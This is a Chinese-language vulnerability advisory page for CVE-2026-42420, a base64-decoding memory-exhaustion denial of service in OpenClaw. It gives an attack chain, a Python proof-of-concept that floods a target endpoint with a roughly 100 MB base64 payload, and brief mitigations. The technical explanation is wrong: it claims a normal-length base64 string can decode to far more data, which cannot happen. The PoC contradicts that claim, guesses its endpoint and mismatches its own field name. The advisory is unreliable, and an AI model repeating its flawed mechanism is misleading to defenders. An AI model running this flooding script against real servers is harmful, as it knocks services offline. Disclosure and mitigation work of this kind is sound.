CVE-2026-42420 CVSS 4.3 中危

CVE-2026-42420 OpenClaw内存耗尽漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42420

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.4.8之前的版本中存在严重的安全漏洞，主要涉及base64解码路径中的不当输入验证机制。由于程序在分配内存时未先强制执行解码数据大小限制，攻击者可以通过发送特制的base64编码输入，利用多个代码路径耗尽系统内存资源。这种内存耗尽攻击会导致应用程序崩溃或无法响应，从而实现拒绝服务。该漏洞需要低权限用户权限即可通过网络远程触发，无需用户交互，对系统的可用性构成潜在威胁。

技术细节

该漏洞的根本原因在于OpenClaw处理base64解码时的逻辑缺陷。在受影响的版本中，当程序接收base64编码的输入时，会先根据编码后的长度估算并分配内存空间，随后才对解码后的实际数据大小进行校验。这种“先分配，后校验”的顺序存在严重风险。攻击者可以构造一个正常长度的base64字符串，但其解码后的实际数据大小远超预期（例如利用base64编码的填充机制或特定字符组合）。当程序尝试将过大的解码数据写入预先分配的较小缓冲区时，会导致内存管理混乱或直接耗尽可用内存。由于攻击向量为网络（AV:N）且无需用户交互（UI:N），远程攻击者只需拥有低权限账号即可持续发送恶意请求，导致服务器资源枯竭，最终造成服务中断。

攻击链分析

STEP 1

侦察

识别网络上运行OpenClaw且版本低于2026.4.8的目标服务器。

STEP 2

构造攻击载荷

攻击者创建一个经过base64编码的恶意字符串，该字符串在解码后会膨胀为巨大的数据量。

STEP 3

发送请求

利用低权限账号，通过API接口将恶意载荷发送给目标服务器。

STEP 4

触发漏洞

服务器在解码前分配内存，处理过大的数据导致内存耗尽，服务停止响应。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import base64

def generate_exploit_payload(size_mb):
    """Generates a base64 payload that decodes to a large size."""
    # Create a large block of data
    data = b'A' * (size_mb * 1024 * 1024)
    # Encode to base64
    return base64.b64encode(data).decode('utf-8')

def exploit(target_url, size_mb=100):
    """Sends the payload to the target OpenClaw instance."""
    payload = generate_exploit_payload(size_mb)
    print(f"Generated payload with encoded length: {len(payload)}")
    
    # Assuming the vulnerable endpoint accepts a JSON body with a 'data' field
    # The specific endpoint depends on the OpenClaw implementation
    try:
        response = requests.post(
            target_url, 
            json={"input": payload}, 
            timeout=10
        )
        print(f"Server response status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"Exploit likely successful (Server crashed or timed out): {e}")

if __name__ == "__main__":
    # Replace with actual target endpoint
    TARGET = "http://vulnerable-openclaw-server/api/decode"
    exploit(TARGET)

影响范围

OpenClaw < 2026.4.8

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界部署WAF规则，检测并拦截包含异常长度base64字符串的请求。同时，在操作系统层面对OpenClaw服务进程实施资源配额限制（如cgroups），防止单个异常请求耗尽服务器全部内存资源。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表